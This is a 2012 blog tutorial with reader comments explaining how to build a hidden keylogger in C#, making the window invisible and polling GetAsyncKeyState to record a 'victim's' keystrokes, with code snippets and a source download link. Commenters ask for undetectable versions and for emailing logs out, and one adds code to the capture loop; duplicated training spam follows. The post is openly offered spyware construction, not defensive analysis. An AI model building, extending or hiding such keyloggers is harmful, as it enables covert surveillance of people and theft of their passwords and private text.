Friday, September 14, 2012

Have you ever wonder how keylogger is working or ever try to create your own keylogger using C# ?
Yes ! - No ! doesn't matter heheheeee :-) as m still going to tell how you can create a small application using visual studio ide & c# which is nothing but a keylogger.
First of all you need to know what is a keylogger?
Ans. : A keylogger is a software program that records the real time activity of a computer user including the keyboard keys they press.


To create a keylogger you may follow these :

  1. Create a windows application which runs hidden in background.
  2. Application captures keystrokes pressed by victim and save them into a log file.


Problem 1 : How to run a window application in background?
Solution  : Create a windows application using vs and set properties of the Form -> ShowIcon and ShowInTaskbar to false and Opacity=0. 
(Note : Application is still visible through  
Taskmanager->Processes heheheheeee)



Problem 2 : How to get pressed keystrokes?
Solution  : We can get key-strokes easily if we have focus on our own application but when victim has focus on some other application then how can we get keystrokes pressed by victim? :-( 
In this situation we need to use API 
(Application programming interface) provided by Microsoft itself to make the job done. Microsoft provides an unmanaged API called Win32 which has a dll file called User32.dll. The  

User32.dll library allows managing the entire user interface. It has a function called GetAsyncKeyState which we need to call to get the pressed key asynchronously.


Problem 3 : How to call functions from an unmanaged dll ?
Solution  : In C# we use DllImport attribute for calling method from unmanaged code.
Syntax:- (Don't forget to include using System.Runtime.InteropServices;)
[DllImport("User32.dll")]
private static extern short GetAsyncKeyState(System.Windows.Forms.Keys vKey);

We also need to declare the method before we can use it because User32.dll is created using c++. 
The DllImport attribute specifies the dll location that contains the implementation of an extern method, that's why I  
declare the method as extern. I also declared it static so that it belongs to the type itself rather than to a specific object. Any method implemented with the help of DllImport must have  
the extern modifier.



(Note : extern is used to indicate that method is implemented externally)



The GetAsyncKeyState function determines whether a key is up or down at the time the function is called and whether the key was pressed after a previous call to GetAsyncKeyState.

Final step :
Now add a timer control to a window form and set Interval property to 10 or 20 and in the Tick event of the timer iterate through all the Keys and find which one is pressed, by using  
GetAsyncKeyState method.

How to iterate ?(I think you know)
But if don't then :-

foreach(System.Int32 i in Enum.GetValues(typeof(Keys)))
{
if(GetAsyncKeyState(i) == -32767)
{
//To get key name use-> Enum.GetName(typeof(Keys), i) function
// Now you have the pressed key. Do whatever you want !
}
}

 :-) cheers...

Download sample application & source code

30 comments:

Sartan said...

Excellent Work..!

Krishan Gahlot said...

Thanks...
Finally someone praises my work

Quran said...

Why all keys are in upper case :)

Krishan Gahlot said...

Quran- source code is attached so customize the code according to ur needs :-)

الهاشمي said...

great but !
can i get a unenglish key ??
and how to do it ?

Abdullah said...

This is very helpful. Great work

black blast said...

I just got new in C# and coding etc.... could you make a little quick easy tutorial for a keylogger that is undetectable and that can run on the back ground ?? I just started to follow a IT school you see and im very intrested in these things.
IF you want too.
Thanks
Blackindy

e cig charger said...

I am It student i got new int c#.net.This is very helpful..Thanks

Anonymous said...

very informative ,,,, i was searching for this for two months,,,thanks for gr8 help...and very easy too

BVB said...

for some reason I can't create the file in C:\

Help!

أحمد said...

really great job

GuiiCoellho said...

It did not work ...

Krishan Gahlot said...

@GuiiCoellho:May be you are missing something. What is the issue u r facing mr.?

Anonymous said...

it works for certain symbols are not recognized. like: @,.,& etc etc

Anonymous said...

Man..U'RE a GENIUS!!! :O AWESOMe n really reaLLYY Simpleee code! wow! Thumbz up!

Anonymous said...

the main block of the code just returns "cannot convert int to System.Windows.Forms.Keys

What adjustments need to be made?

Nikhil Rajesh said...

Can You upload a video how to make it or please suggest me any good ready-made keylogger rather ardamax!!Do this keylogger gives every activity of the victim??!

Reply Fastt!!

Nikhil Rajesh said...

Can You upload a video how to make it or please suggest me any good ready-made keylogger rather ardamax!!Do this keylogger gives every activity of the victim??!

Reply Fastt!!

Krishan Gahlot said...

Download ready made keylogger from here
csharpdemos.blogspot.in/2010/03/personal-keylogger.html

jhonny bravo said...

really superb u r excellent sir u not only show us how to develop key logger but also expalin small mall parts very clealry really tdy i learnt many thngs thank you very much u r gr8 ... one help sir i want to explore more on System.Runtime.InteropServices and user32.dll fucntions pls sir gv me links or u nly explain(i wud prefer becz no one teaches better than you) plsssssssssss

planetcazmo said...

Thank you for sharing !!!
Here is how to detect if you are upper or lower case:
To detect a upper case , 'CapsLock' key must be pressed.See the code below:

--------------------------------------
System.Windows.Forms.Control.IsKeyLocked(Keys.CapsLock)
--------------------------------------

If that statement is - true, that mean the computer is on upper case mode otherwise it`s on lower case.To finish the job we can convert lower to upper and opposite.

Finally we have to change the code in timer -key:

----------------------------------------
private void key_Tick(object sender, EventArgs e)
{
foreach(int i in Enum.GetValues(typeof(Keys)))
{
if(GetAsyncKeyState(i) == -32767)
{
if (System.Windows.Forms.Control.IsKeyLocked(Keys.CapsLock) == true)
keyBuffer.Append(Enum.GetName(typeof(Keys), i));
else
keyBuffer.Append(Enum.GetName(typeof(Keys), i).ToLower());
}
}
}
----------------------------------------
!!!You can add a similar code to detect if the 'Shift' key is pressed, because: Shift + t = T.
You can also add space between letter if the 'space' key is pressed, because you will get the word (Space) in your *.txt file.

Nigel Malpartida said...

does not work with windows service

Diego Lima said...

hello guys.

The application is not generating the log.

what can be?

Thanks & Best Regards.

VIKAS DAHIYA said...

Thanks to solve my problem Sir :)

Anonymous said...

not understanding where the info is stored and how I retrieve it, I searched your code and found nothing to do with email. can you please explain for I am very new.

Unknown said...

hello bhai ji
ive created the keylogger but i want it to email the log file to me once in a while can u explain me how to do this?
thanks

Unknown said...

thanks! i was looking for a good code but didnot found because they all were complex. but you saved my ass

Kel Stephen said...

Hi Folks,

I'm currently working on an application that takes keyboard keys, remap them to some other Unicode characters and send them, using Sendkeys.Send(), to applications such as Notepad, Ms Word etc. I have had somewhat minor success with global Keyboard Hook.

At the moment, I'm sort of stuck! When I try detecting if 'Caps Lock' is ON and consequently convert the corresponding characters to Lowercase, the keyboard hook program won't pull it off.

A piece of my code is as shown below. As you'd notice, when the 'Caps Lock' is ON and a key such as Q is pressed, the program should map it to "ɣ" and then send it to other applications, otherwise send “Ɣ” instead.

Can any one please help me. Appreciate it advance.

private GlobalKeyboardHook ghook;

private string toSend;
private bool _shiftPressed = false;

private void Form1_Load(object sender, EventArgs e)
{
keyBuffer = new StringBuilder();
Console.OutputEncoding = System.Text.Encoding.Unicode;
ghook = new GlobalKeyboardHook();
ghook.KeyDown +=new KeyEventHandler(ghook_KeyDown);
foreach (Keys key in Enum.GetValues(typeof(Keys)))
ghook.HookedKeys.Add(key);
ghook.hook();
}

private void ghook_KeyDown(object sender, KeyEventArgs e)
{
toSend = " ";
textBox2.Text = e.KeyCode.ToString();
//Convert to Lowercase if 'Caps Lock' is On

if (Control.IsKeyLocked(Keys.CapsLock))

{ capLock = true;
e.Handled = true;
}

//Remap uppercase letters into Unicode characters

else
{
capLock = false;
//eat this key event to prevent it from being pressed by the OS
e.Handled = true;
switch(e.KeyCode)
{
case Keys.Q:
toSend = "Ö";
break;
case Keys.F:
toSend = "Ŋ";
break;
case Keys.S:
toSend = "Ɣ";
break;
default:
//ghook.unhook();
break;
}

}

if (capLock)
{
//MessageBox.Show("The Caps Lock key is OFF.");
switch(e.KeyCode)
{
case Keys.Q:
toSend = "ö";
break;
case Keys.F:
toSend = "ŋ";
break;
case Keys.S:
toSend = "ɣ";
break;
default:
//ghook.unhook();
break;
}
}

if (toSend != null)
{
ghook.unhook();
textBox1.Text += toSend;
SendKeys.Send(toSend);
e.Handled = true;
ghook.hook();
}
}

Nitesh Kumar said...

I really appreciate information shared above. It’s of great help. If someone want to learn Online (Virtual) instructor lead live training in C SHARP, kindly contact us http://www.maxmunus.com/contact
MaxMunus Offer World Class Virtual Instructor led training on C SHARP. We have industry expert trainer. We provide Training Material and Software Support. MaxMunus has successfully conducted 100000+ trainings in India, USA, UK, Australlia, Switzerland, Qatar, Saudi Arabia, Bangladesh, Bahrain and UAE etc.
For Demo Contact us.
Nitesh Kumar
MaxMunus
E-mail: nitesh@maxmunus.com
Skype id: nitesh_maxmunus
Ph:(+91) 8553912023
http://www.maxmunus.com/




Nitesh Kumar said...

I really appreciate information shared above. It’s of great help. If someone want to learn Online (Virtual) instructor lead live training in C SHARP, kindly contact us http://www.maxmunus.com/contact
MaxMunus Offer World Class Virtual Instructor led training on C SHARP. We have industry expert trainer. We provide Training Material and Software Support. MaxMunus has successfully conducted 100000+ trainings in India, USA, UK, Australlia, Switzerland, Qatar, Saudi Arabia, Bangladesh, Bahrain and UAE etc.
For Demo Contact us.
Nitesh Kumar
MaxMunus
E-mail: nitesh@maxmunus.com
Skype id: nitesh_maxmunus
Ph:(+91) 8553912023
http://www.maxmunus.com/




Post a Comment